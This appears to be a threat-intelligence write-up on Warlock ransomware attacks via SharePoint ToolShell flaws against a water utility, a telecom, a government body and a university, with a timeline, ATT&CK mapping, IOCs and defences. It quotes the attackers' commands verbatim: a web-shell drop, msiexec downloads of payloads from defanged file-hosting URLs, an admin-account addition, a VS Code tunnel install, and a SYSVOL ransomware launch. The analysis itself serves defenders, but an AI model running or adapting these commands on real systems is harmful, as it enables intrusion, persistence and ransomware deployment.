ThreatPaper
RansomwareCritical

Warlock ransomware exploits SharePoint ToolShell flaws to hit water, telecom and government targets

By Sethu Satheesh · 6 Oct 2026 · 16 min read

Threat Actor: Warlock group (tracked as Storm-2603, GOLD SALEM, Longlegs) · Target: Critical infrastructure, government and education in Portuguese- and Spanish-speaking countries (water utility, telecom, regional government, university)

Source: www.security.com


Executive Summary

On October 1, 2026, the Symantec and Carbon Black Threat Hunter Team (Broadcom) published forensic research showing that the China-nexus operators behind Warlock ransomware are still breaking into organizations through Microsoft SharePoint vulnerabilities, more than a year after the "ToolShell" exploit chain first brought the group to prominence. Symantec tracks the actor as Longlegs (also tracked by Microsoft as Storm-2603) and reports that, over the preceding two months, the group attacked at least four organizations in Portuguese- and Spanish-speaking countries across Europe, Africa, and Latin America.1

The four victims included two critical-infrastructure operators — a water utility and a telecommunications provider — alongside a regional government body and a university.1 Symantec reconstructed one intrusion against a critical-infrastructure operator in detail: beginning July 22, 2026 with a web shell on an on-premises SharePoint server, the attackers harvested the farm's ASP.NET machine keys, achieved code execution inside the SharePoint application pool, moved laterally across the domain, installed a Visual Studio Code tunnel for covert remote access, and then — in the early hours of July 31 — pushed an AV/EDR-killing tool to at least 40 hosts within about two hours before staging the Warlock ransomware in the domain's SYSVOL share, from where ordinary Active Directory replication delivered it to at least 33 hosts.1

Attribution to a nation state is unsettled and vendor-dependent. Microsoft assesses Storm-2603 "with moderate confidence to be a China-based threat actor" and notes it has "not identified links between Storm-2603 and other known Chinese threat actors."2 Symantec describes the operator as "China-nexus" and ties Longlegs back to older activity clusters it tracks as CL-CRI-1040, CamoFei, and ChamelGang — a group associated with espionage.1 Sophos's Counter Threat Unit, which tracks the same operation as GOLD SALEM and notes the actor self-identifies as "Warlock Group," says it has "insufficient evidence to corroborate" the China attribution.3 The group emerged on the Russian-language RAMP forum in June 2025 and has deployed both Warlock and LockBit ransomware.23

Why it matters: the research is a reminder that the 2025 ToolShell SharePoint flaws (CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, CVE-2025-53771) remain a working route into unpatched on-premises deployments, and that patching alone is insufficient once machine keys have been stolen.14 It also exposes a gap worth watching: downstream coverage framed the campaign as "now including" newer 2026 SharePoint vulnerabilities, while the primary research pins only the 2025 ToolShell set to the group's arsenal and leaves the specific vulnerabilities used in the July 2026 intrusion unconfirmed.15

Verification of Claims

  1. Claim: Warlock operators attacked at least four organizations across Europe, Africa, and Latin America in two months. → Verified → Symantec's Threat Hunter Team states it directly, naming a water utility, a telecommunications provider, a regional government body, and a university in Portuguese- and Spanish-speaking countries.1

  2. Claim: In one intrusion the attackers disabled security software on 40+ hosts in ~2 hours, then ransomwared 33+ hosts via SYSVOL. → Verified → These are Symantec's own first-party telemetry figures for a single critical-infrastructure intrusion, with the SYSVOL replication path captured by dfsrs.exe parentage on three further hosts.1

  3. Claim: Initial access was gained by exploiting SharePoint ToolShell vulnerabilities. → Partially verified → Symantec states the initial vector was "likely" SharePoint exploitation and observed the machine-key-signed __VIEWSTATE deserialization method that is characteristic of ToolShell; it does not name the specific CVE used in this intrusion. Microsoft independently documented ToolShell exploitation by this actor in 2025.12

  4. Claim: The K7RKScan vulnerable driver was used to disable security software in this intrusion. → Partially verified → Symantec says the vulnerable driver behind the AV/EDR killer (a.exe) in this specific intrusion "remains unknown," and that K7RKScan (CVE-2025-1055) was the driver used "in other recent attacks" by the group.16

  5. Claim: The Warlock operator is a China-based threat actor. → Partially verified → Microsoft assesses this with moderate confidence; Symantec calls it "China-nexus"; Sophos's CTU says it has insufficient evidence to corroborate nation-state attribution. The assessment is real and reportable; treating it as settled is the error.23

  6. Claim: The Warlock operator is the same actor as the ChamelGang espionage group. → Partially verified → Symantec ties Longlegs to clusters it tracks as CL-CRI-1040, CamoFei, and ChamelGang. Microsoft states it has not identified links between Storm-2603 and other known Chinese threat actors — a direct conflict between first-party assessments.12

Timeline

Date Actor Event Source
June 2025 Warlock Group Operation surfaces on the Russian-language RAMP forum; Warlock ransomware emerges 31
July 8, 2025 Microsoft CVE-2025-49704 (code injection) and CVE-2025-49706 (spoofing) published for SharePoint Server 78
July 20–22, 2025 Microsoft CVE-2025-53770 (deserialization RCE, exploited in the wild) and CVE-2025-53771 published; Microsoft details ToolShell exploitation and Storm-2603 ransomware deployment 492
July 1, 2026 CISA Adds newer SharePoint deserialization flaw CVE-2026-45659 to the Known Exploited Vulnerabilities catalog 10
July 22, 2026 Longlegs Web shell installed on SharePoint server (Computer 1) via PowerShell WriteAllBytes to a LAYOUTS .aspx path 1
July 24, 2026 Longlegs Recon (net user /domain, whoami) on Computer 2; staging-artifact cleanup; DLL side-loading pairs dropped; nltest /domain_trusts run 1
July 27, 2026 Longlegs Out-of-band callback to an oastify[.]com Burp Collaborator subdomain with the target's own domain baked in 1
July 28, 2026 Longlegs System.Workflow.ComponentModel assembly loaded to reach the deserialization gadget; RCE in the SharePoint app pool; msiexec fetches payloads from catbox and wasabi 1
July 28–29, 2026 Longlegs Domain account SPSEPRDSetup added to local Administrators on Computers 3–5; VS Code tunnel installed on Computer 4; NetExec run from Computer 2 1
July 31, 2026 Longlegs AV/EDR killer (a.exe) executed on 40+ hosts in ~2 hours; run.exe/rune.exe and ransom note deployed to 33+ hosts via SYSVOL 1
October 1, 2026 Symantec Threat Hunter Team publishes the campaign research 1
October 2, 2026 The Record Reports the campaign, framing it as including newer SharePoint vulnerabilities 5

Attack Anatomy

Initial access and web shell

The group gains initial access by exploiting multiple vulnerabilities in on-premises Microsoft SharePoint Server (T1190).1 The first observed activity in the reconstructed intrusion was on July 22, 2026, when a web shell was written to the SharePoint LAYOUTS directory on Computer 1 using a PowerShell one-liner that base64-decodes an ASPX payload to disk (T1505.003):

powershell -nop -c "[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMON\microsoft shared\web server extensions\14\template\layouts\layout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))"

Symantec notes the group drops the web shell into the LAYOUTS directory for multiple SharePoint versions at once, so it functions regardless of which version is installed.1

Machine-key harvest and ViewState deserialization (defender view)

The web shell's purpose is to harvest the SharePoint farm's ASP.NET machine keys.1 At a defender's level the weakness works like this: a SharePoint farm authenticates __VIEWSTATE data with its configured machine keys (the validation and decryption keys). An attacker who steals those keys can present a __VIEWSTATE value that carries a valid message authentication code, so the server accepts it as trusted and deserializes it. Deserializing attacker-chosen data reaches a gadget that turns a trusted-but-malicious object into code execution inside the SharePoint application pool worker (w3wp.exe). In the intrusion, Computer 1 repeatedly ran a PowerShell command that loads the assembly exposing that gadget (T1059.001):

"CSIDL_SYSTEM\cmd.exe" /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35')

The defensive consequence is that patching alone does not evict the attacker: once machine keys are stolen, they stay valid until rotated. Detection artifacts include web shells under LAYOUTS, the System.Workflow.ComponentModel assembly-load pattern from a worker process, and out-of-band callbacks to canary domains such as oastify[.]com carrying the victim's own domain name.1

Reconnaissance and credential access

Reconnaissance used living-off-the-land binaries: net user /domain and whoami for account and user discovery (T1087.002, T1033), and "CSIDL_SYSTEM\nltest.exe" /domain_trusts to enumerate Active Directory trust relationships (T1482).1 Later, NetExec (nxc.exe), the open-source successor to CrackMapExec, was run for AD enumeration, credential spraying (T1110.003), and remote command execution.1

Payload delivery and DLL side-loading

With code execution established, Computer 2 ran msiexec against three distinct packages on two legitimate hosting services in roughly ninety minutes (T1218.007, T1105), blending delivery into normal traffic:

msiexec.exe /q /i "hxxps://litter.catbox[.]moe/6f5tdt.msi"
msiexec.exe /q /i "hxxps://s3.wasabisys[.]com/fortifs/vamd64.msi"
msiexec /q /i hxxps://xn8xyt-drop.s3.wasabisys[.]com/xn8xyt.msi

The group used DLL side-loading throughout (T1574.001), pairing signed executables with malicious DLLs — for example doexe.exe with doexeloc.dll, and ssvagent.exe/logger.exe with gsdll64.dll.tmp and doexeloc.dll.tmp, staged in CSIDL_SYSTEM\0409\ before being copied into ProgramData. Early numerically-named staging files were deleted to tidy artifacts (T1070.004).1

Lateral movement and covert remote access

The attackers repeatedly added a domain account named SPSEPRDSetup to the local Administrators group on three further hosts (T1098.007), a likely masquerade of SharePoint's SPS/SP-prefixed service-account convention:

net localgroup administrators SPSEPRDSetup /add

On Computer 4 they installed Visual Studio Code's tunnel feature as a Windows service for covert remote access (T1543.003, T1219, T1572), relaying through Microsoft's own infrastructure so it blends into expected developer/admin traffic:

"CSIDL_WINDOWS\debug\code-insiders.exe" tunnel service install --accept-server-license-terms

Tooling was moved between hosts over mapped SMB admin shares (T1021.002).1

Defense evasion: bring-your-own-vulnerable-driver

In the early hours of July 31, the attackers pushed an AV/EDR-killing tool (a.exe) across the environment using a consistent one-liner that mapped an internal share, copied the tool, and launched it. The resulting execution was recorded on at least 40 hosts within about two hours. Symantec says the vulnerable driver abused in this intrusion is unknown, but that the group has used the signed-but-vulnerable K7RKScan driver (CVE-2025-1055) in other recent attacks to terminate protected security processes at the kernel level — the BYOVD technique (T1685).16

Ransomware deployment via SYSVOL

As protection fell on each host, two binaries — run.exe and rune.exe — and a ransom note titled how to restore your files.txt appeared on at least 33 hosts (T1486). The payload was staged in the domain's SYSVOL share and distributed domain-wide:

"CSIDL_SYSTEM\cmd.exe" /c copy \\[REMOVED]\SYSVOL\[VICTIM DOMAIN]\scripts\run\* CSIDL_PROFILE\public /y & start /B cmd /c "c:\users\public\run.exe 2>nul || exit" & start /B cmd /c "c:\users\public\rune.exe 2>nul || exit"

Telemetry from three further hosts recorded the Distributed File System Replication service (dfsrs.exe) as the parent delivering run.exe and rune.exe from the SYSVOL scripts\run path, confirming the payload reached those hosts through ordinary SYSVOL replication rather than a separate push.1

Loading diagram...

Threat Actor Profile

Name: Longlegs (as tracked by Symantec) Aliases: Storm-2603 (Microsoft); GOLD SALEM (Sophos / Secureworks Counter Threat Unit); self-identifies as "Warlock Group." Symantec additionally ties Longlegs to older clusters it tracks as CL-CRI-1040, CamoFei, and ChamelGang.123 Attribution confidence: Microsoft — moderate confidence, China-based, with no links identified to other known Chinese actors.2 Symantec — "China-nexus," with an asserted tie to the ChamelGang espionage cluster.1 Sophos CTU — insufficient evidence to corroborate the China attribution.3 Motivation: Financially motivated ransomware and extortion; a possible espionage overlap is asserted by Symantec and disputed by Microsoft.12

The operation surfaced on the Russian-language RAMP forum in June 2025 and has deployed both Warlock and LockBit ransomware.23 Sophos CTU reported roughly 60 published victims spanning North America, Europe, and South America, from small entities to large multinationals, and observed the group avoiding organizations in China and Russia.3 Symantec notes earlier Warlock activity against the United States, Brazil, India, Russia, Taiwan, and Japan, making the recent concentration on Portuguese- and Spanish-speaking countries notable — either opportunistic targeting of exposed SharePoint servers or more deliberate tasking.1

Tradecraft is heavy on living-off-the-land tooling, signed Microsoft binaries (VS Code Insiders tunnels), legitimate cloud file-sharing for payload delivery, and BYOVD for defense evasion — a toolkit built to blend into normal enterprise traffic.1

MITRE ATT&CK techniques (IDs verified live on attack.mitre.org):

ID Technique
T1190 Exploit Public-Facing Application
T1505.003 Server Software Component: Web Shell
T1059.001 Command and Scripting Interpreter: PowerShell
T1105 Ingress Tool Transfer
T1218.007 System Binary Proxy Execution: Msiexec
T1574.001 Hijack Execution Flow: DLL
T1087.002 Account Discovery: Domain Account
T1033 System Owner/User Discovery
T1482 Domain Trust Discovery
T1110.003 Brute Force: Password Spraying
T1098.007 Account Manipulation: Additional Local or Domain Groups
T1543.003 Create or Modify System Process: Windows Service
T1219 Remote Access Tools
T1572 Protocol Tunneling
T1021.002 Remote Services: SMB/Windows Admin Shares
T1685 Disable or Modify Tools
T1070.004 Indicator Removal: File Deletion
T1486 Data Encrypted for Impact

OPSEC: Masquerading a malicious account as a SharePoint service account (SPSEPRDSetup); tunneling remote access through Microsoft infrastructure; downloading from legitimate services (catbox[.]moe, wasabisys[.]com); deleting early staging artifacts; and using SYSVOL replication rather than a noisy per-host push.1

Technical Indicators

cve_exploited_2025_toolshell:
  - CVE-2025-49704   # SharePoint code injection (RCE), CVSS 8.8
  - CVE-2025-49706   # SharePoint improper authentication (spoofing), CVSS 6.5
  - CVE-2025-53770   # SharePoint deserialization of untrusted data (RCE), CVSS 9.8, exploited in the wild
  - CVE-2025-53771   # SharePoint improper authentication (spoofing), CVSS 6.5
cve_byovd:
  - CVE-2025-1055    # K7RKScan.sys IOCTL process-termination (used in other recent attacks; not confirmed in this intrusion)
file_sha256_warlock:
  - 116ca4e88a1bcebb6c0da7fb431c8eca7b8ef3f9767194820c56091972ccac2c
  - 155fb1cbdaea12c83ba92d18c88cf38bbc42bb684f913ca0bc26fcf115426a55
  - 6d07f1232dc59b84038fd0b2e75fdd3d5b825882bb0dba9e6724b7b0823fa3ad
  - 8b58f7811a2a2f2a5024220490473774f02759dd2dd904b5b9fabfbaae37125f
  - 8ce8d8270ee9de02644530b8dd7fa78973b4a3b80f121e2c5f45ae68cce196f9
file_sha256_malicious_dll:
  - 1edb2c0b537cd95bbd5fc16321b4c38a6adf325ccc7b588ad6acc980b0463b60
  - 206f27ae820783b7755bca89f83a0fe096dbb510018dd65b63fc80bd20c03261
  - 27b7591cf9e1283010ca98fa5dbe970a73fee0d8cde277639924c144718db7c0
  - c46825fcc0d1bf7a8b192facb176d6bf916c9dccfd6fa994be691e3b0e585f4e
  - e14240bac8277b0f6dd4d29ab5da20d246bcccae647e5fe8d19cdae7fe471b20
  - fb3846c9ac53d1b841ada3a6b1091153fea41a169cb44fe0084097d1f4d45984
file_sha256_av_edr_killer:
  - 73c5268256c9da5488cd9e2b79013060ac321c7e54129344dc7b51e268af36ea
file_sha256_vulnerable_driver:
  - ae9f7fce57c7b928e659dccf0e00fa79cd9cd61a106f18d4e03f92dc3a03c295
file_sha256_suspicious:
  - 37f94fe1b4a106f02b6f74a69cbc05e69c17406f688beef4c9a045ffcbd2e65e
  - 9ceb01f8bf7d6dba2ae07f5bd6070de3ec67b5eb01f969b0ba85e74564fb83a7
  - aaff04d84ef85353966aa4af186ff1254b72c068f33f802417b29dc23fb9f192
  - e3204b05e2f3a29bb6e6fcc21dda77d7cd31dfa755c21da0aa8661b5619ee0a1
  - eea631b5f7125239db0811e4682c2316ead69f9822e02d94fb5d8bf0d2faebed
  - f7269f80f81e99d06a590d7ab374e12fdf7e5f55a02c2a46c342d670f8519fdf
network_payload_delivery:
  - litter[.]catbox[.]moe
  - xn8xyt-drop[.]s3[.]wasabisys[.]com
  - catbox[.]moe
  - wasabisys[.]com
network_oob_callback:
  - '*.oastify[.]com'   # Burp Collaborator OOB testing; victim domain baked into the subdomain
host_artifacts:
  - 'layout2sp.aspx (web shell in SharePoint LAYOUTS directory)'
  - 'code-insiders.exe installed as a Windows service (VS Code tunnel)'
  - 'domain account SPSEPRDSetup added to local Administrators'
  - 'run.exe, rune.exe, a.exe in C:\Users\Public'
  - 'how to restore your files.txt (ransom note)'
  - 'dfsrs.exe delivering run.exe/rune.exe from SYSVOL scripts\run'
note: >
  SHA256 file hashes and the two network IOCs are published by Symantec's Threat
  Hunter Team; labels are Symantec's. The AV/EDR-killer driver used in the detailed
  intrusion was not identified by Symantec; K7RKScan (CVE-2025-1055) is attributed to
  the group in other recent attacks. Network indicators are defanged.

Microsoft issued patches and guidance for the ToolShell SharePoint vulnerabilities in July 2025 and publicly documented Storm-2603's exploitation and ransomware deployment at that time.2 The four ToolShell CVEs were published in July 2025, and CISA has continued to add newer SharePoint flaws to its Known Exploited Vulnerabilities catalog — including the deserialization vulnerability CVE-2026-45659 on July 1, 2026 — which The Record cites as the basis for describing the campaign as involving "newer" SharePoint vulnerabilities.510

No public indictment, sanctions designation, or coordinated law-enforcement takedown tied to the Warlock operation or to Longlegs / Storm-2603 / GOLD SALEM had been reported in the primary and vendor sources reviewed as of October 6, 2026; Sophos's CTU and Microsoft both treat the actor as an active, un-dismantled threat group.23

Impact Assessment

  • Confirmed: At least four organizations attacked over two months — a water utility, a telecommunications provider, a regional government body, and a university — in Portuguese- and Spanish-speaking countries across Europe, Africa, and Latin America.1
  • Confirmed: In one critical-infrastructure intrusion, security software was disabled on at least 40 hosts within about two hours and Warlock ransomware was deployed to at least 33 hosts via SYSVOL replication.1
  • Reported, not independently confirmed: Sophos CTU counted roughly 60 published Warlock victims historically, spanning North America, Europe, and South America.3
  • Estimated: Symantec frames the inclusion of critical-infrastructure operators as a reminder of the "potential real-world consequences" of ransomware against essential services; no operational or safety disruption to water or telecom service is evidenced in the report.1
  • Unknown: Ransom demands, payments, data exfiltration volumes, downtime, and any impact to operational-technology / ICS systems (as distinct from the IT/Active Directory estate) have not been disclosed.1

Lessons and Defensive Recommendations

For SOC / detection engineers:

  • Alert on web shells written under the SharePoint LAYOUTS path, on worker processes (w3wp.exe) spawning PowerShell that loads System.Workflow.ComponentModel, and on outbound DNS/HTTP to oastify[.]com subdomains carrying your own domain name.1
  • Treat code-insiders.exe tunnel service install, net localgroup administrators <acct> /add, and nltest /domain_trusts on servers as high-signal events.1
  • Hunt for msiexec /q /i pulling from catbox[.]moe or *.wasabisys[.]com, and for dfsrs.exe delivering executables out of SYSVOL scripts paths.1

For SharePoint / platform administrators:

  • Apply the ToolShell patches (CVE-2025-49704/49706/53770/53771) and newer SharePoint fixes, but also rotate ASP.NET machine keys after any suspected compromise — patching does not invalidate stolen keys.14
  • Enable AMSI integration and constrain the SharePoint app-pool identity's reach into the domain.2

For Active Directory / identity teams:

  • Monitor SYSVOL for unexpected executables and tighten who can write to scripts / Group Policy paths; a writable SYSVOL turns one foothold into domain-wide code execution.1
  • Watch for service-account-style names being added to local Administrators groups across multiple hosts in a short window.1

For leadership:

  • A year-old vulnerability class is still ending in domain-wide ransomware against critical infrastructure; prioritize machine-key rotation, BYOVD driver blocklisting, and tested offline backups over assuming "patched" equals "safe."1
  • Treat vendor attribution as a spectrum: the China nexus here is a moderate-confidence assessment disputed by another first-party researcher, not an established fact.23

Sources

Footnotes

  1. Symantec / Security.com (Threat Hunter Team) — Warlock Ransomware Attackers Hit Water and Telecom Operators — October 1, 2026 ↩ ↩2 ↩3 ↩4 ↩5 ↩6 ↩7 ↩8 ↩9 ↩10 ↩11 ↩12 ↩13 ↩14 ↩15 ↩16 ↩17 ↩18 ↩19 ↩20 ↩21 ↩22 ↩23 ↩24 ↩25 ↩26 ↩27 ↩28 ↩29 ↩30 ↩31 ↩32 ↩33 ↩34 ↩35 ↩36 ↩37 ↩38 ↩39 ↩40 ↩41 ↩42 ↩43 ↩44 ↩45 ↩46

  2. Microsoft Security — Disrupting active exploitation of on-premises SharePoint vulnerabilities — July 22, 2025 ↩ ↩2 ↩3 ↩4 ↩5 ↩6 ↩7 ↩8 ↩9 ↩10 ↩11 ↩12 ↩13 ↩14

  3. Sophos (Counter Threat Unit) — GOLD SALEM's Warlock operation joins busy ransomware landscape — September 19, 2025 ↩ ↩2 ↩3 ↩4 ↩5 ↩6 ↩7 ↩8 ↩9 ↩10 ↩11

  4. NVD — CVE-2025-53770: SharePoint Server deserialization of untrusted data — July 20, 2025 ↩ ↩2 ↩3

  5. The Record (Recorded Future News) — 'Warlock' ransomware used in attacks on critical infrastructure in Portuguese, Spanish-speaking countries — October 2, 2026 ↩ ↩2 ↩3

  6. NVD — CVE-2025-1055: K7RKScan.sys IOCTL process termination — June 11, 2025 ↩ ↩2

  7. NVD — CVE-2025-49704: SharePoint code injection — July 8, 2025 ↩

  8. NVD — CVE-2025-49706: SharePoint improper authentication (spoofing) — July 8, 2025 ↩

  9. NVD — CVE-2025-53771: SharePoint improper authentication (spoofing) — July 20, 2025 ↩

  10. CISA — CISA Adds One Known Exploited Vulnerability to Catalog (CVE-2026-45659) — July 1, 2026 ↩ ↩2

Topics: #warlock#storm-2603#gold-salem#longlegs#sharepoint#toolshell#byovd#sysvol#critical-infrastructure#ransomware
Original Incident Report →

Related Research

South Africa's air navigation provider ATNS found ransomware-linked malware in an OT network supporting aviation weather services, with suspected data exfiltration to China-based IPs. No flights were disrupted; the actor is unknown and a forensic probe is under way.

RansomwareOT & Industrial Systems

The BlackSuit ransomware group (a rebrand of Royal Ransomware) compromised CDK Global, the dominant Dealer Management System provider for North American auto dealerships, causing a weeks-long outage affecting ~15,000 dealerships' ability to sell, finance, service, and manage vehicles — one of the most disruptive ransomware incidents against a critical software supplier in 2024.

Ransomware

The ALPHV/BlackCat ransomware group compromised Change Healthcare, the largest US healthcare claims clearinghouse, causing a nationwide outage of pharmacy, medical claims, and payment processing affecting hundreds of thousands of providers, pharmacies, and patients — the most significant cyberattack on US healthcare infrastructure to date.

RansomwareFinancial Fraud